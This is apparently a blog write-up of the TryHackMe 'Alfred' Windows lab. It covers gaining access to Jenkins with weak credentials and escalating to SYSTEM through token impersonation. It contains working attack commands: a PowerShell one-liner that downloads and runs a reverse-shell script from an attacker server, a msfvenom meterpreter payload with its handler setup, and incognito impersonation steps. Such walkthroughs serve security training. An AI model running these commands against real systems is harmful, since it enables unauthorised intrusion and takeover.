Tryhackme — Alfred writeup (Windows)

We began to scan the machine with AutoRecon


There are 1 more port which is 3389 are open and the full nmap scan from AutoRecon did not pick up.

Upon access port 8080, it present us with a Jenkin page. We are able to access the admin page by trying weak credential.

We then found a feature that allows us to execute command below:

powershell iex (New-Object Net.WebClient).DownloadString(‘http://your-ip:your-port/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress your-ip -Port your-port

Before executing the command, we should have Invoke-PowerShellTcp.ps1 hosted on a http server.

By listening on reverse shell port, we got an initial access!

To make our privilege escalation easier, we generate another shell using command below:

msfvenom -p windows/meterpreter/reverse_tcp -a x86 — encoder x86/shikata_ga_nai LHOST=[IP] LPORT=[PORT] -f exe -o [SHELL NAME].exe

The final size of our generated exe payload was 73802

And upload to the server using previous method.

Before executing our new shell, we should have below setting running in msf console:

use exploit/multi/handler

set PAYLOAD windows/meterpreter/reverse_tcp

set LHOST ip

set LPORT listening-port


And a meterpreter shell is spawned!

Now that we have initial access, let’s use token impersonation to gain system access.

Windows uses tokens to ensure that accounts have the right privileges to carry out particular actions. Account tokens are assigned to an account when users log in or are authenticated. This is usually done by LSASS.exe(think of this as an authentication process).

This access token consists of:

  • user SIDs(security identifier)
  • group SIDs
  • privileges

There are two types of access tokens:

  • primary access tokens: those associated with a user account that are generated on log on
  • impersonation tokens: these allow a particular process(or thread in a process) to gain access to resources using the token of another (user/client) process

For an impersonation token, there are different levels:

  • SecurityAnonymous: current user/client cannot impersonate another user/client
  • SecurityIdentification: current user/client can get the identity and privileges of a client, but cannot impersonate the client
  • SecurityImpersonation: current user/client can impersonate the client’s security context on the local system
  • SecurityDelegation: current user/client can impersonate the client’s security context on a remote system

where the security context is a data structure that contains users’ relevant security information.

The privileges of an account(which are either given to the account when created or inherited from a group) allow a user to carry out particular actions. Here are the most commonly abused privileges:

  • SeImpersonatePrivilege
  • SeAssignPrimaryPrivilege
  • SeTcbPrivilege
  • SeBackupPrivilege
  • SeRestorePrivilege
  • SeCreateTokenPrivilege
  • SeLoadDriverPrivilege
  • SeTakeOwnershipPrivilege
  • SeDebugPrivilege

We can view our privilege using command below:

whoami /priv

We can see that two privileges(SeDebugPrivilege, SeImpersonatePrivilege) are enabled. Let’s use the incognito module that will allow us to exploit this vulnerability using the command below:

load incognito

Please note, we may need to use the use incognito command if the previous command doesn’t work. Also ensure that our Metasploit is up to date.

To check which tokens are available, enter the below command:

list_tokens -g

We can see that the BUILTIN\Administrators token is available. Use the command below to impersonate the Administrators token:

impersonate_token “BUILTIN\Administrators””


root.txt is stored on C:\Windows\System32\config

But even though we have a higher privileged token we may not actually have the permissions of a privileged user (this is due to the way Windows handles permissions — it uses the Primary Token of the process and not the impersonated token to determine what the process can or cannot do). Ensure that we migrate to a process with correct permissions. The safest process to pick is the services.exe process.

First use the command below to view processes and find the PID of the services.exe process:


Migrate to this process using the command below:




Be happy, always

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store